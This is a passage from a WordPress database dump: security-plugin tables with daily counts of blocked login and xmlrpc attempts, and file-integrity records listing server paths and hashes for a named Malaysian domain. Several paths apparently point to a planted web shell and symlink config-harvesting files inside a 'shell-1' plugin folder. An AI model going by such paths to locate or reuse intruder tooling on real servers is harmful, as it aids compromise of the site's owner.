s:5:\"login\";i:22;s:5:\"admin\";i:4;s:6:\"xmlrpc\";i:6;}i:1571788800;a:3:{s:5:\"login\";i:60;s:6:\"xmlrpc\";i:3;s:5:\"admin\";i:2;}i:1571875200;a:3:{s:5:\"login\";i:48;s:6:\"xmlrpc\";i:2;s:5:\"admin\";i:1;}i:1571961600;a:3:{s:5:\"login\";i:41;s:6:\"xmlrpc\";i:5;s:5:\"admin\";i:3;}i:1572048000;a:3:{s:5:\"login\";i:30;s:6:\"xmlrpc\";i:3;s:5:\"admin\";i:1;}i:1572134400;a:2:{s:5:\"login\";i:36;s:6:\"xmlrpc\";i:2;}i:1572220800;a:3:{s:5:\"login\";i:37;s:6:\"xmlrpc\";i:4;s:5:\"admin\";i:3;}i:1572307200;a:1:{s:5:\"login\";i:32;}i:1572393600;a:3:{s:5:\"admin\";i:16;s:5:\"login\";i:31;s:6:\"xmlrpc\";i:3;}i:1572480000;a:3:{s:5:\"login\";i:65;s:5:\"admin\";i:1;s:6:\"xmlrpc\";i:7;}i:1572566400;a:3:{s:6:\"xmlrpc\";i:3;s:5:\"login\";i:38;s:5:\"admin\";i:1;}i:1572652800;a:2:{s:5:\"login\";i:50;s:6:\"xmlrpc\";i:3;}i:1572739200;a:2:{s:5:\"login\";i:22;s:6:\"xmlrpc\";i:1;}i:1572825600;a:2:{s:5:\"login\";i:18;s:6:\"xmlrpc\";i:6;}i:1572912000;a:3:{s:6:\"xmlrpc\";i:31;s:5:\"login\";i:77;s:5:\"admin\";i:1;}i:1572998400;a:2:{s:5:\"login\";i:160;s:6:\"xmlrpc\";i:57;}i:1573084800;a:2:{s:5:\"login\";i:16;s:6:\"xmlrpc\";i:4;}i:1573171200;a:3:{s:6:\"xmlrpc\";i:4;s:5:\"login\";i:9;s:5:\"admin\";i:18;}i:1573257600;a:3:{s:5:\"admin\";i:27;s:5:\"login\";i:21;s:6:\"xmlrpc\";i:3;}i:1573344000;a:3:{s:6:\"xmlrpc\";i:3;s:5:\"login\";i:28;s:5:\"admin\";i:1;}i:1573430400;a:3:{s:6:\"xmlrpc\";i:22;s:5:\"login\";i:17;s:5:\"admin\";i:13;}i:1573516800;a:3:{s:5:\"admin\";i:14;s:5:\"login\";i:27;s:6:\"xmlrpc\";i:1;}i:1573603200;a:3:{s:6:\"xmlrpc\";i:5;s:5:\"login\";i:28;s:5:\"admin\";i:2;}i:1573689600;a:3:{s:5:\"login\";i:8;s:5:\"admin\";i:2;s:6:\"xmlrpc\";i:2;}}}');
/*!40000 ALTER TABLE `wpdp_ip_geo_block_stat` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_itsec_distributed_storage`
--

DROP TABLE IF EXISTS `wpdp_itsec_distributed_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_itsec_distributed_storage` (
  `storage_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `storage_group` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL,
  `storage_key` varchar(40) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `storage_chunk` int(11) NOT NULL DEFAULT '0',
  `storage_data` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `storage_updated` datetime NOT NULL,
  PRIMARY KEY (`storage_id`),
  UNIQUE KEY `storage_group__key__chunk` (`storage_group`,`storage_key`,`storage_chunk`)
) ENGINE=MyISAM AUTO_INCREMENT=268 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_itsec_distributed_storage`
--

LOCK TABLES `wpdp_itsec_distributed_storage` WRITE;
/*!40000 ALTER TABLE `wpdp_itsec_distributed_storage` DISABLE KEYS */;
INSERT INTO `wpdp_itsec_distributed_storage` (`storage_id`, `storage_group`, `storage_key`, `storage_chunk`, `storage_data`, `storage_updated`) VALUES (245,'file-list','files',3,'{\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/norfaiz-MyBB.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tc_symconf\\/rpcuser-BoxBilling.txt\":{\"d\":false,\"h\":false},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/shell-1\\/tatsumi_sym\\/root\":{\"d\":1545963104,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/display\\/general-metaboxes.php\":{\"d\":1545210464,\"h\":\"a9cdfca586c12d798dcb0e136f724d09\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/display\\/credits-content.php\":{\"d\":1545210464,\"h\":\"c82f52a0898ce3892fe818454792f66f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/display\\/welcome-content.php\":{\"d\":1545210464,\"h\":\"929bc3f2c3d1ec5491a5dba41e3c2acd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/display\\/welcome.php\":{\"d\":1545210464,\"h\":\"16498c0453d6cb63ec41dec2ba211540\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/display\\/index.php\":{\"d\":1545210464,\"h\":\"73f69d273ce2032faa2ca513639b6509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/display\\/dashboard_widget.php\":{\"d\":1545210464,\"h\":\"16b3049f1e9e32db8bf9d2cbb9fd6bc2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/display\\/menu.php\":{\"d\":1545210464,\"h\":\"31792c7d76316107b982c00d84fe38ac\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/meta_import.php\":{\"d\":1545210464,\"h\":\"1e38894b4ba3eccce9b0af563200c9e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/index.php\":{\"d\":1545210464,\"h\":\"73f69d273ce2032faa2ca513639b6509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/aioseop_module_class.php\":{\"d\":1545210464,\"h\":\"d6eb3d5bdf840ab3128a6bd1b0ce992d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/admin\\/aioseop_module_manager.php\":{\"d\":1545210464,\"h\":\"1c1cd33956ba68d20426ff10c1b26c7a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/public\\/js\\/vendor\\/autotrack.js\":{\"d\":1545210464,\"h\":\"821f6d0a78030d536815363dd1fb8f39\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/public\\/front.php\":{\"d\":1545210464,\"h\":\"2d32c203ef267f1755b0d98d62914e56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/public\\/index.php\":{\"d\":1545210464,\"h\":\"73f69d273ce2032faa2ca513639b6509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/public\\/opengraph.php\":{\"d\":1545210464,\"h\":\"a21197d99649c269fd39855752e05b36\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/public\\/google-analytics.php\":{\"d\":1545210464,\"h\":\"2d4be8e9dda802f82fe286c144e0b979\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/css\\/modules\\/aioseop_module-rtl.css\":{\"d\":1545210464,\"h\":\"f1b1b58fefca1cda90ec6e15e06b6ab8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/css\\/modules\\/aioseop_module.css\":{\"d\":1545210464,\"h\":\"df8f103ad2e1bdc3149d8006d456f7ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/css\\/aiosp_admin.css\":{\"d\":1545210464,\"h\":\"203d02588e2d4b16bebc64af687ba44d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/css\\/welcome.css\":{\"d\":1545210464,\"h\":\"6b6535a2268a84f37db62c9f4108953a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_bad_robots.php\":{\"d\":1545210464,\"h\":\"8c029d49db107e94b874816f62c0e8b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_video_sitemap.php\":{\"d\":1545210464,\"h\":\"6e8aa6b25b4c50233728e6379ee34e26\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_robots.php\":{\"d\":1545210464,\"h\":\"63b94603ad63d2e40b0121f328d11472\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/index.php\":{\"d\":1545210464,\"h\":\"73f69d273ce2032faa2ca513639b6509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_file_editor.php\":{\"d\":1545210464,\"h\":\"cd15c32e17e38ff96ebdcbb58ed558e9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_opengraph.php\":{\"d\":1545210468,\"h\":\"b9fdf4aef427fcb698146426484ae3ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_feature_manager.php\":{\"d\":1545210468,\"h\":\"eeb7c968cfe985503673ad27c473166b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_importer_exporter.php\":{\"d\":1545210468,\"h\":\"a9d4766021c0791cc3c25d02604b109b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_sitemap.php\":{\"d\":1545210468,\"h\":\"507fcff5e81053ae4c3932db5cf9af34\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/modules\\/aioseop_performance.php\":{\"d\":1545210468,\"h\":\"9bf8ab85cc979c0598dcb0493a4ecad2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/modules\\/aioseop_module.js\":{\"d\":1545210468,\"h\":\"d1d737ba0ac5b78c02f248605f07e21d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/modules\\/aioseop_module.min.js\":{\"d\":1545210468,\"h\":\"7ace518f788b8b932783dafb5e2cff89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/modules\\/aioseop_opengraph.js\":{\"d\":1545210468,\"h\":\"7b5a0377a27d7c1d5e00f46f9910d62e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/quickedit_functions.min.js\":{\"d\":1545210468,\"h\":\"041037d456cf6c55e3bdae69d091da1d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/quickedit_functions.js\":{\"d\":1545210468,\"h\":\"8d641e17462cd7719fa726b05d5abf1c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/welcome.min.js\":{\"d\":1545210468,\"h\":\"87cff5d46e59ccb987fff7688fd75ddd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/welcome.js\":{\"d\":1545210468,\"h\":\"88c306c12372fdd1cf65a2622f6eea72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/js\\/count-chars.js\":{\"d\":1545210468,\"h\":\"f95e920647f88dbdf06a14208b575df5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/i18n\\/all-in-one-seo-pack.pot\":{\"d\":1545210468,\"h\":\"31a142dbcf0b260e29d356a82102b017\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/extlib\\/OAuth.php\":{\"d\":1545210468,\"h\":\"02cbb0b94e32b074f81f350e7446dedf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/compatability\\/abstract\\/aiosep_compatible.php\":{\"d\":1545210468,\"h\":\"47db01f5e084253b609c1bdf7f1192e4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/compatability\\/compat-init.php\":{\"d\":1545210468,\"h\":\"29c73b974e8efb3c7ec8f78af978bade\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/compatability\\/compat-wpml.php\":{\"d\":1545210468,\"h\":\"fbe82d19fc5e50adac9b54b11ea5f887\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/aioseop_functions.php\":{\"d\":1545210468,\"h\":\"b54e504d4d1762bb4dbab45f238accf1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/sitemap-xsl.php\":{\"d\":1545210468,\"h\":\"20d69dffcba07f6cd23ad5ea6c335d70\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/aioseop_UTF8.php\":{\"d\":1545210468,\"h\":\"83e7a109a5b4eb1f89c8fec97a628e65\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/commonstrings.php\":{\"d\":1545210468,\"h\":\"7bbcf65474980b4b0df6f85bf5ab48fd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/translations.php\":{\"d\":1545210468,\"h\":\"c2a5ee531a679b8b1822732cb35e4b06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/index.php\":{\"d\":1545210468,\"h\":\"73f69d273ce2032faa2ca513639b6509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/aiosp_common.php\":{\"d\":1545210468,\"h\":\"46d57d2048cbea990709b0cd3dd93f3b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/inc\\/aioseop_updates_class.php\":{\"d\":1545210468,\"h\":\"59b1aee4f254ab82220a5dd5da0c994b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/aioseop_class.php\":{\"d\":1545210464,\"h\":\"90ee49d093f63809c7c3cc830e6eb2b5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/wpml-config.xml\":{\"d\":1545210464,\"h\":\"3a8179af7b5166c18694afeabdd87a1d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/index.php\":{\"d\":1545210468,\"h\":\"73f69d273ce2032faa2ca513639b6509\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/all_in_one_seo_pack.php\":{\"d\":1545210468,\"h\":\"a6873500b68d51cd3faaf6ec47c5b3ca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/aioseop-init.php\":{\"d\":1545210468,\"h\":\"19435dd521443b928543f3ac717e0b0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/all-in-one-seo-pack\\/readme.txt\":{\"d\":1545210468,\"h\":\"ef60c8323b495ae7c7934f7e21397d23\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-comments-post.php\":{\"d\":1525290086,\"h\":\"35bad2f931d0169557f53d0090d6f942\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-signup.php\":{\"d\":1525034426,\"h\":\"1b902775bb00c7996bbe7a0fc8dfd8d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/googled517ac07ced695b8.html\":{\"d\":1545731679,\"h\":\"6228def7ff1224c6d6f5fd593b00fb73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-login.php\":{\"d\":1544673263,\"h\":\"c9d0aa044ad3462aab0e86efca084512\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/adminer.php\":{\"d\":1542300057,\"h\":\"53d7245216a640f2e0f4ce87ef50441b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/22.html\":{\"d\":1545888874,\"h\":\"b4b2a6bcd0493b2c47087119b21d5023\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-blog-header.php\":{\"d\":1450515028,\"h\":\"edad74614d6d3fa2252c3d74ff037ac7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/1541531346\":{\"d\":1541531695,\"h\":\"b159cb36c091de1bb486735b3ca56643\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-config-sample.php\":{\"d\":1450250906,\"h\":\"d1490486fc3f4965a6200256a7fe11b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/xmlrpc.php\":{\"d\":1472652090,\"h\":\"6c53e2ff076280c5cfc410a3c632c785\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/license.txt\":{\"d\":1547081533,\"h\":\"40fc2f39d472a1bb52f4ebe59702e0c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-load.php\":{\"d\":1503393768,\"h\":\"8edbcbcc51de98432f95aee15a561263\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/error_log\":{\"d\":1547089997,\"h\":\"beb7237bb9c28b8909e6f84e157b4fb1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-mail.php\":{\"d\":1484102624,\"h\":\"8d6c9e4dab7697a044a22a96cd787068\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/.ftpquota\":{\"d\":1545415510,\"h\":\"f1c7487c6efd4ade889dac90ffb7a5ba\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-cron.php\":{\"d\":1503194866,\"h\":\"d757d0ea6ee22b647e6acbdebf00683f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/.htaccess\":{\"d\":1545735283,\"h\":\"55c07efa5d5897f6ba5b16df30d368fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/index.php\":{\"d\":1380059292,\"h\":\"b61b25303be0f573a6b9446d5cbe3a5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-config.php\":{\"d\":1545794813,\"h\":\"d9239320eda021396af40e1e4df6d298\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-trackback.php\":{\"d\":1508787772,\"h\":\"1b1908c12e1b3089f6cce5bf8dc7eca0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/readme.html\":{\"d\":1547081533,\"h\":\"55d27f1f9f7f79fa2593a5b32907ee44\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-settings.php\":{\"d\":1540269280,\"h\":\"57ed1f1f9ec5687235d6ba4b64cfb000\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-links-opml.php\":{\"d\":1479687390,\"h\":\"55f5eeda4f64271322d249c14685c162\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/1541531695\":{\"d\":1541531953,\"h\":\"322c3bec50ef4a166c68429283564269\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-activate.php\":{\"d\":1544673263,\"h\":\"5390edef68ed88f21f7f9e33717d7149\"}}','2019-01-10 03:50:35'),(244,'file-list','files',2,'{\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-remote-request.php\":{\"d\":1545638232,\"h\":\"f2e968753455b545996bae78fcde5db5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin.php\":{\"d\":1545638232,\"h\":\"91d764711084c76a83b1f21286fba2fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/ajax.php\":{\"d\":1545638232,\"h\":\"4ec50c5a048384ef9bd5fcebe0f391d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-yoast-alerts.php\":{\"d\":1545638232,\"h\":\"f6453204b5a4baf28bb8ac4e040dcc04\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-premium-upsell-admin-block.php\":{\"d\":1545638232,\"h\":\"0e40e70b7c48f3513d9741c38bf77cab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-primary-term-admin.php\":{\"d\":1545638232,\"h\":\"505bf1ada1ad07760151dfd5c9af6746\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-recalculate-scores.php\":{\"d\":1545638232,\"h\":\"d92f370fe11721f7443cea4bf2ef1abb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/admin\\/class-admin-asset-yoast-components-l10n.php\":{\"d\":1545638232,\"h\":\"9e5d176abc925f03fc0afecc8545daaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/cli\\/class-cli-redirect-upsell-command-namespace.php\":{\"d\":1545638232,\"h\":\"cad3d143c1299579667583dc7032930e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/cli\\/class-cli-yoast-command-namespace.php\":{\"d\":1545638232,\"h\":\"71b2dc8d776ce342d71a9d72f10356ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/j4mie\\/idiorm\\/demo.php\":{\"d\":1545638232,\"h\":\"77de680d5c28d913dfa6f63f00d12a75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/j4mie\\/idiorm\\/idiorm.php\":{\"d\":1545638232,\"h\":\"773e2245577fe4d4dd585e304a7c02d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Migration\\/Base.php\":{\"d\":1545638232,\"h\":\"dce42bb079db8e799fdc32edca10e55e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Util\\/Naming.php\":{\"d\":1545638232,\"h\":\"e7e7c7fadb8033db73db26b9350092a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Util\\/Migrator.php\":{\"d\":1545638232,\"h\":\"3ee77c4dabebb8ee645f85dc52179263\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Util\\/Logger.php\":{\"d\":1545638232,\"h\":\"5c4b9f94f6d507abdda078b3bf6546c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/PgSQL\\/Base.php\":{\"d\":1545638232,\"h\":\"2e7b05865329290759ea490d6384bba8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/PgSQL\\/TableDefinition.php\":{\"d\":1545638232,\"h\":\"a1cf1a0a00ba52b31d31b52362d676b9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/Sqlite3\\/Base.php\":{\"d\":1545638232,\"h\":\"2f60f1c970a4da610e7c6cf914fa7e7b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/Sqlite3\\/TableDefinition.php\":{\"d\":1545638232,\"h\":\"2bf4cec909b121a9f0739456a7814a91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/MySQL\\/Base.php\":{\"d\":1545638232,\"h\":\"bf662c9e3ffd1355b8a66035ae507857\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/MySQL\\/TableDefinition.php\":{\"d\":1545638232,\"h\":\"0f7fb4576a31384c5dd0dd2283d16318\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/Base.php\":{\"d\":1545638232,\"h\":\"92eef6b77f15ac00ef57ed6d344579a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/ColumnDefinition.php\":{\"d\":1545638232,\"h\":\"2d49ed02d2a0bb6c8cc3e2e9fba0d1d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/TableDefinition.php\":{\"d\":1545638232,\"h\":\"099629e61756d6470815fdf837e58134\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Adapter\\/Interface.php\":{\"d\":1545638232,\"h\":\"ffcff95322e18eef91a73789c6e41a1a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Task\\/Base.php\":{\"d\":1545638232,\"h\":\"55c831b51c6f3c5ec94ab55f96985356\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/wordpress-seo\\/vendor_prefixed\\/ruckusing\\/lib\\/Ruckusing\\/Task\\/Manager.php\":{\"d\":1545638232,\"h\":\"4f3187d2cc63c0ddb76602bfc1a49539\"},\"\\/home\\/norfaiz\\/public_html\\/bintara